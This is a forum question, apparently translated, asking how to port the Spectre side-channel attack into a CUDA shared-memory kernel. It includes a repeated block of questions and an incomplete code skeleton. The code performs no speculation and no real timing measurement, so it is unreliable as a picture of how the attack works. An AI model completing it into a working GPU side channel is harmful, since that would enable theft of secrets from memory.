CUDA programmers in this forum: I am trying to port Spectre into a CUDA kernel that uses shared memory.
The problem is: how does the retpoline mitigation affect its accuracy?
Also, for example, if the secret value is absent from or present in the cache, does the timing measurement change? If so, how? I cannot understand this.
How does one know whether a timing difference below threshold_value means success or failure? And how often does this go wrong, for example when there is noise in the timing measurements or contention for shared resources?
Can one use cudaOccupancyMaxPotentialBlockSize and nvprof for this? With what settings?
The problem is: how does the retpoline mitigation affect its accuracy?
Also, for example, if the secret value is absent from or present in the cache, does the timing measurement change? If so, how? I cannot understand this.
How does one know whether a timing difference below threshold_value means success or failure? And how often does this go wrong, for example when there is noise in the timing measurements or contention for shared resources?
Can one use cudaOccupancyMaxPotentialBlockSize and nvprof for this? With what settings?
C:
// Host-side global byte; main() flushes its cache line with _mm_clflush.
// The kernel declares its own __shared__ variable with the same name, which is
// a separate object from this one.
unsigned char secret = 0;
// Host-side source data for the kernel's `target` argument (see main()).
// The kernel reads a single byte from it at index `offset`.
unsigned char target[256];
// Host-side source data for the kernel's `table` argument (see main()).
// NOTE(review): sized 256 * 4096, but the kernel indexes it as
// secret * blockDim.x + threadIdx.x -- confirm which stride is intended.
unsigned char table[256 * 4096];
// Kernel: thread 0 of the block copies target[offset] into a block-shared byte;
// after a block-wide barrier every thread reads one byte of `table` at index
// secret * blockDim.x + threadIdx.x.
//
// target / table must be readable from device code. Neither `offset` nor the
// computed table index is bounds-checked here.
__global__ void Spectre_attack(unsigned char* target, unsigned char* table, int offset)
{
    __shared__ unsigned char secret;

    const unsigned int tid = threadIdx.x;

    // A single thread stages the byte so the whole block sees the same value.
    if (tid == 0) {
        secret = target[offset];
    }
    // Barrier is outside the branch so every thread in the block reaches it.
    __syncthreads();

    const unsigned int slot = secret * blockDim.x + tid;
    // NOTE(review): `value` is never used afterwards, so the compiler is free
    // to drop this load entirely.
    unsigned char value = table[slot];
    // continue spectre gpu parallel + shared memory????
}
// Host driver: copies the host `target` / `table` buffers to device memory,
// launches Spectre_attack 1000 times with one block of 256 threads, and after
// each launch brackets a (still empty) host-side region with __rdtscp.
//
// Returns 0 on success, 1 if any CUDA runtime call or kernel launch fails.
//
// NOTE(review): `offset` and `threshold` are not declared in this snippet;
// they are assumed to be defined elsewhere -- confirm.
int main()
{
    // init --> target buffer+table....
    _mm_clflush(&secret);

    // The kernel dereferences its pointer arguments on the device, so it must
    // be given device allocations rather than the host arrays themselves.
    unsigned char* d_target = 0;
    unsigned char* d_table = 0;
    cudaError_t err = cudaMalloc(&d_target, sizeof(target));
    if (err == cudaSuccess) {
        err = cudaMalloc(&d_table, sizeof(table));
    }
    if (err == cudaSuccess) {
        err = cudaMemcpy(d_target, target, sizeof(target), cudaMemcpyHostToDevice);
    }
    if (err == cudaSuccess) {
        err = cudaMemcpy(d_table, table, sizeof(table), cudaMemcpyHostToDevice);
    }

    // gpu kernel param
    dim3 grid_dim(1, 1, 1);
    dim3 block_dim(256, 1, 1);

    // run --> measure timing difference
    for (int i = 0; i < 1000 && err == cudaSuccess; i++) {
        Spectre_attack<<<grid_dim, block_dim>>>(d_target, d_table, offset);
        // Launch-configuration errors only show up through cudaGetLastError().
        err = cudaGetLastError();
        if (err == cudaSuccess) {
            // Faults raised while the kernel runs are reported by the sync.
            err = cudaDeviceSynchronize();
        }
        if (err != cudaSuccess) {
            break;
        }

        unsigned int junk;
        unsigned long long start_time = __rdtscp(&junk);
        // read --> secret value inside gpu memory
        unsigned long long end_time = __rdtscp(&junk);
        if (end_time - start_time < threshold) {
            // secret value --> access
        }
    }

    // cudaFree accepts a null pointer, so this is safe on every path.
    cudaFree(d_table);
    cudaFree(d_target);
    return err == cudaSuccess ? 0 : 1;
}
Последнее редактирование: